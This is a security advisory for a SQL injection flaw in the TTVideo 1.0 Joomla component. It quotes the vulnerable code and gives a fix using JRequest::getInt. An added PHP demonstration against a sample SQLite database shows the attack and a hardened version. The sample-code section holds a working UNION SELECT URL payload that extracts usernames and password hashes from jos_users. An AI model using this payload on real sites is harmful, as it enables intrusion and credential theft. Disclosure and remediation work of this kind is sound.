Joomla Component TTVideo 1.0 SQL Injection Vulnerability
2010-07-28 15:52:49 Author: honkwin Source: Views: 0
Test method:
Programs (methods) provided on this site may be offensive in nature and are intended solely for security research and teaching; use them at your own risk!
TTVideo 1.0 Joomla Component SQL Injection Vulnerability
 
Download link: http://www.toughtomato.com/resources/downloads/joomla-1.5/components/ttvideo/
 
 Name              TTVideo
 Vendor            http://www.toughtomato.com
 Versions Affected 1.0
 
 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-07-27
 
X. INDEX
 
 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
 
 
I. ABOUT THE APPLICATION
________________________
 
TTVideo is a Joomla! component that makes use of the
popular video sharing site Vimeo to create a video
library.
 
 
II. DESCRIPTION
_______________
 
A parameter in ttvideo.php is not properly sanitised
before being used in a SQL query.
 
 
III. ANALYSIS
_____________
 
Summary:
 
 A) SQL Injection
 
 
A) SQL Injection
________________
 
The parameter cid passed to ttvideo.php when task is set
to video is not properly sanitised before being used in
a SQL query. This can be exploited to manipulate SQL
queries by injecting arbitrary SQL code. The following
is the vulnerable code:
 
ttvideoController.php (line 40):
 
function video() {
    $cid = JRequest::getVar('cid', null, 'default');
    
 
ttvideo.php (line 188):
 
function getVideo($id) {
    $db = $this->getDBO();
    $db->setQuery("SELECT * from #__ttvideo WHERE id=$id");
    $video = $db->loadObject();
    if ($video === null)
      JError::raiseError(500, 'Video with ID: '.$id.' not found.');
    return $video;
}
 
 
IV. SAMPLE CODE
_______________
 
A) SQL Injection
 
http://site/path/index.php?option=com_ttvideo&task=video&cid=-1 union   select 1,2,3,4,5,6,7,8,CONCAT(username,0x3A,password),10,11,12,13,14,15,16,17 FROM jos_users
 
 
V. FIX
______
 
Use JRequest::getInt instead of JRequest::getVar
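The following is an added example, not the advisory's or TTVideo's own code, showing why the fix works. It reproduces the shape of getVideo() from ttvideo.php against a constructed in-memory SQLite database (tables standing in for #__ttvideo and #__users), then shows the hardened form: an integer cast, which is what JRequest::getInt does to the request value, plus a bound parameter so the value never becomes part of the SQL text. Function and table names here are assumptions for the demonstration.

```php
<?php
// Added example (not from the advisory or the TTVideo component).
// Runs stand-alone with PHP's PDO SQLite driver.

function buildDb(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // Constructed sample schema standing in for #__ttvideo and #__users.
    $db->exec("CREATE TABLE jos_ttvideo (id INTEGER PRIMARY KEY, title TEXT)");
    $db->exec("CREATE TABLE jos_users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)");
    $db->exec("INSERT INTO jos_ttvideo VALUES (1, 'first video')");
    $db->exec("INSERT INTO jos_users VALUES (62, 'admin', 'hash-placeholder')");
    return $db;
}

// Mirrors the vulnerable getVideo(): the raw request value is interpolated
// straight into the query string, so the whole value is parsed as SQL.
function getVideoVulnerable(PDO $db, string $id) {
    $stmt = $db->query("SELECT * FROM jos_ttvideo WHERE id=$id");
    return $stmt->fetch(PDO::FETCH_ASSOC);
}

// Hardened form. The (int) cast is the equivalent of reading the value with
// JRequest::getInt; the bound parameter keeps the value out of the SQL text
// even if a later change passes something other than an integer.
function getVideoHardened(PDO $db, string $rawId): ?array {
    $id = (int) $rawId;   // "-1 UNION SELECT ..." becomes -1
    $stmt = $db->prepare("SELECT * FROM jos_ttvideo WHERE id = :id");
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$db = buildDb();

// Constructed request value with the same shape as the advisory's sample:
// a negative id followed by a UNION that matches the two-column table.
$cid = "-1 UNION SELECT id, username || ':' || password FROM jos_users";

// Vulnerable: the result is a jos_users row dressed up as a "video".
var_dump(getVideoVulnerable($db, $cid));

// Hardened: the cast reduces the value to -1, and no such video exists.
var_dump(getVideoHardened($db, $cid));

// Hardened with a legitimate value still returns the expected row.
var_dump(getVideoHardened($db, "1"));
```

The cast alone is enough to close this particular bug because the query compares against an integer column; the bound parameter is the habit worth keeping for the string-valued cases where a cast does not apply.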